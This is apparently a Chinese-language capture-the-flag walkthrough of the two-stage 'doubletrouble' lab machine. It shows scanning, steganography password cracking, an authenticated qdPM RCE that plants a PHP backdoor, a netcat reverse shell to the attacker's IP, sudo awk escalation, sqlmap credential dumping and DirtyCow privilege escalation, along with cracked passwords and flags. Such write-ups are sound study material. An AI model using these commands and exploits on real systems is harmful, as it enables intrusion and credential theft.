doubletrouble wp复盘

因为这台机子形式比较特殊，所以做个wp

nmap

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -p- 192.168.48.67 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:17 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds

详细扫描

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.48.67 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0019s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.80 seconds

脚本扫描

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap --script=vuln -p22,80 192.168.48.67 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0017s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /backups/: Backup folder w/ directory listing
|   /robots.txt: Robots file
|   /batch/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /core/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /install/: Potentially interesting folder
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /secret/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /template/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 38.25 seconds

由于只开放了两个端口，先看80端口

看到这样一个页面

可以看到一个CMS，qdPM 9.1，大致看了一下，要么是需要身份认证要么比较难利用

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ searchsploit qdPM 9.1
---------------------------------------------------------------- ---------------------------------Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting  | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection                            | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting              | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection              | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting                          | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload                                | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution                                | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (Authenticated)                | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)     | php/webapps/50944.py
qdPM < 9.1 - Remote Code Execution                              | multiple/webapps/48146.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

先看nmap的结果收集更多信息

有一个secret目录，可能藏有重要的线索

这里面有一个图片，下载下来

先看是否有嵌入文件

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ binwalk -e doubletrouble.jpgDECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

再看是否有隐写文件

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ steghide info doubletrouble.jpg
"doubletrouble.jpg":format: jpegcapacity: 4.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 

看样子是有隐写的

我查看了其他的目录，均无信息

看来只有爆破了

这里可以用比较常见的stegcraker,

推荐用stegseek,爆破rockyou也只要几秒时间

瞬间得到密码

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: "92camaro"       
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".┌──(kali㉿kali)-[~/replay/doubletr]
└─$ ls
doubletrouble.jpg  doubletrouble.jpg.out  nmapscan┌──(kali㉿kali)-[~/replay/doubletr]
└─$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666                     

尝试登录80

进入后台

这个时候就可以尝试之前searchspolit的Authenticated RCE,50175要报错，尝试50944

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ python3 50944.py -url http://192.168.206.67/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.The DateStamp is 2025-09-06 02:48 
The DateStamp is 2025-09-16 01:41 
Backdoor uploaded at - > http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=whoami

发现可以成功利用

尝试反弹shell拿到初始shell

http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=nc%20192.168.206.200%201234%20-e%20/bin/bash

拿到初始shell

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nc -lvnp 1234           
listening on [any] 1234 ...
connect to [192.168.206.200] from (UNKNOWN) [192.168.206.67] 33996
ls
584189-backdoor.php
807754-backdoor.php
895627-backdoor.php
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$ ls
ls
584189-backdoor.php  807754-backdoor.php  895627-backdoor.php
www-data@doubletrouble:/var/www/html/uploads/users$

www-data@doubletrouble:/var/www/html/uploads/users$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on doubletrouble:(ALL : ALL) NOPASSWD: /usr/bin/awk

允许以root身份无密码执行awk

在gtfobins上找awk

查得可以执行

sudo awk 'BEGIN {system("/bin/sh")}'

www-data@doubletrouble:/var/www/html/uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
<uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
doubletrouble.ova
# 

成功提权，但是并没有拿到root flag,只有一个doubletrouble.ova

使用scp先拿到攻击机再放入共享文件夹以安装

先改个密码：123

# passwd root 
passwd root
New password: 123Retype new password: 123passwd: password updated successfully

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ scp root@192.168.206.67:/root/doubletrouble.ova .
The authenticity of host '192.168.206.67 (192.168.206.67)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:~/.ssh/known_hosts:12: [hashed name]~/.ssh/known_hosts:18: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.206.67' (ED25519) to the list of known hosts.
root@192.168.206.67's password: 
doubletrouble.ova             

导入该靶机

nmap扫描

┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -p- 192.168.206.76 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:04 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds

详细扫描

┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.206.76 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:05 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0013s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

nmap脚本扫描。同时看看80端口

┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap --script=vuln -p22,80 192.168.206.76 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:07 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0013s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.206.76
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.206.76:80/
|     Form id: frmlogin
|     Form action: index.php
|     
|     Path: http://192.168.206.76:80/index.php
|     Form id: frmlogin
|_    Form action: index.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 31.11 seconds

扫描没有发现什么有趣的信息

目录扫描，信息收集

没有其他目录

现在考虑爆破表单和sql注入

尝试sql注入成功

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ sqlmap -u http://192.168.206.76/ --data "uname=a&psw=b" --dbs
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ sqlmap -u http://192.168.206.76/ --data "uname=a&psw=b" -D doubletrouble -T users -C username,password --dump_____H_____ ___[(]_____ ___ ___  {1.9.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 03:33:04 /2025-09-16/[03:33:04] [INFO] resuming back-end DBMS 'mysql' 
[03:33:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=a' AND (SELECT 9051 FROM (SELECT(SLEEP(5)))HQdH) AND 'GNjr'='GNjr&psw=b
---
[03:33:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: Apache 2.2.22, PHP 5.5.38
back-end DBMS: MySQL >= 5.0.12
[03:33:04] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'doubletrouble'
[03:33:04] [INFO] fetching number of column(s) 'password,username' entries for table 'users' in database 'doubletrouble'
[03:33:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[03:33:05] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[03:33:17] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[03:33:22] [INFO] adjusting time delay to 1 second due to good response times
GfsZxc1
[03:33:46] [INFO] retrieved: montreux
[03:34:16] [INFO] retrieved: ZubZub99
[03:34:47] [INFO] retrieved: clapton
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+[03:35:13] [INFO] table 'doubletrouble.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.206.76/dump/doubletrouble/users.csv'
[03:35:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.206.76'

这两个用户均无法登录页面，直接尝试ssh登录

┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ ssh clapton@192.168.206.76 
clapton@192.168.206.76's password: 
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
clapton@doubletrouble:~$ 

成功登录

clapton@doubletrouble:~$ cat user.txt 
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble

后面我大概枚举了一下，没有找到可以提权的地方

uname -a查看内核版本发现很低，

因为听说 自动化枚举脚本（比如 linux-exploit-suggester、linpeas）的工作原理大多是 根据内核版本号去匹配已知 CVE

尝试自动化枚举

clapton@doubletrouble:~$ ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀/---------------------------------------------------------------------------------\|                             Do you like PEASS?                                  ||---------------------------------------------------------------------------------||         Learn Cloud Hacking       :     https://training.hacktricks.xyz         ||         Follow on Twitter         :     @hacktricks_live                        ||         Respect on HTB            :     SirBroccoli                             ||---------------------------------------------------------------------------------||                                 Thank you!                                      |\---------------------------------------------------------------------------------/LinPEAS-ng by carlospolop

[+] [CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04Download URL: https://www.exploit-db.com/download/40611Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-5195] dirtycow 2Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}Download URL: https://www.exploit-db.com/download/40839ext-url: https://www.exploit-db.com/download/40847Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2013-2094] perf_sweventDetails: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/Exposure: highly probableTags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},[ debian=7{kernel:3.2.0-4-amd64} ]Download URL: https://www.exploit-db.com/download/26131Comments: No SMEP/SMAP bypass[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/Exposure: less probableTags: ubuntu=(22.04){kernel:5.15.0-27-generic}Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.cComments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN

先尝试第一个脏牛提权

clapton@doubletrouble:~$ wget https://www.exploit-db.com/download/40611
--2025-09-16 20:30:25--  https://www.exploit-db.com/download/40611
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
ERROR: The certificate of `www.exploit-db.com' is not trusted.
ERROR: The certificate of `www.exploit-db.com' hasn't got a known issuer.

这里因为网站安全性验证下不下来

可以用wget的一个参数--no-check-certificate,可以不检查安全性

clapton@doubletrouble:~$ wget https://www.exploit-db.com/download/40611 --no-check-certificate
--2025-09-16 20:33:15--  https://www.exploit-db.com/download/40611
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
WARNING: The certificate of `www.exploit-db.com' is not trusted.
WARNING: The certificate of `www.exploit-db.com' hasn't got a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 2938 (2.9K) [application/txt]
Saving to: `40611'100%[======>] 2,938       --.-K/s   in 0s      2025-09-16 20:33:19 (24.6 MB/s) - `40611' saved [2938/2938]

注意，我们使用cve的时候，一定要看看poc的使用方法说明，一般来说编译和运行之类的都有指定的条件

clapton@doubletrouble:~$ cat 40611
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################

这个脚本大概是可以把一个root的文件里面的内容随意替换，但是我试了一下，/etc/passwd里面的内容是可以修改，但是有格式不齐等问题

再试试dirtycow2

clapton@doubletrouble:~$ wget https://www.exploit-db.com/download/40839 --no-check-certificate
--2025-09-16 20:43:44--  https://www.exploit-db.com/download/40839
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
WARNING: The certificate of `www.exploit-db.com' is not trusted.
WARNING: The certificate of `www.exploit-db.com' hasn't got a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [application/txt]
Saving to: `40839'100%[======>] 5,006       --.-K/s   in 0s      2025-09-16 20:43:54 (103 MB/s) - `40839' saved [5006/5006]

clapton@doubletrouble:~$ cat 40839 
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

clapton@doubletrouble:~$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bashmmap: 7f80a9d9b000
madvise 0ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
clapton@doubletrouble:~$ cat /etc/passwd
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

这个脚本相当于创建了一个拥有root权限的用户，还给你留了恢复的备份

clapton@doubletrouble:~$ su firefart
Password: 
firefart@doubletrouble:/home/clapton# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:/home/clapton# whoami
firefart
firefart@doubletrouble:/home/clapton# cd /root
firefart@doubletrouble:~# ls
logdel2  root.txt
firefart@doubletrouble:~# cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:~# 

成功拿到root权限

对这个新建的用户，顺便学习一下/etc/passwd：

---

输出 firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash /sbin:/bin/sh

这是 /etc/passwd 文件中的一行，代表一个用户账户。在 Linux 中，每一行都用冒号 : 分隔成不同的字段，每个字段都有特定的含义。

正常的一行通常有 7 个字段，格式为：
用户名:密码:用户ID:组ID:描述:家目录:登录Shell

这一行：

1. fiRbwOlRgkx7g: 密码。在现代 Linux 系统中，这个字段通常只是一个占位符 x，真正的加密密码存储在另一个文件 /etc/shadow 里，只有 root 用户能读取。这里直接出现了看似加密的字符串，这是一个巨大的安全风险。它表明系统可能使用了旧式的、不安全的密码存储方式，或者这个账户是被故意这样设置的，以便攻击者可以使用这个密码直接登录。
2. 0: 用户ID。这是用户的唯一数字标识。UID 为 0 的用户是 root 用户，拥有系统上的最高权限。这是一个极其危险的信号。
3. 0: 组ID。这是用户主要所属组的数字标识。GID 为 0 通常是 root 组，再次确认了这个账户拥有超级用户权限。
4. pwned: 描述（也称为 GECOS 字段）。通常这里会写用户的全名或描述。这里的 “pwned” 是黑客术语，意思是“已被攻破”，这几乎明确宣告了该系统已经被入侵。
5. /root: 家目录。这是用户登录后所在的初始工作目录。普通用户的家目录通常在 /home/ 下，而 /root 是 root 用户的家目录。这进一步证明该账户具有 root 权限。
6. /bin/bash /sbin:/bin/sh: 登录Shell。这是用户登录后启动的命令行解释器。正常的格式应该只有一个 shell 路径（如 /bin/bash）。这里的 /bin/bash /sbin:/bin/sh 格式错误且混乱，看起来像是攻击者在匆忙添加账户时拼接了多个路径，但系统实际上只会尝试执行第一个部分 /bin/bash。

---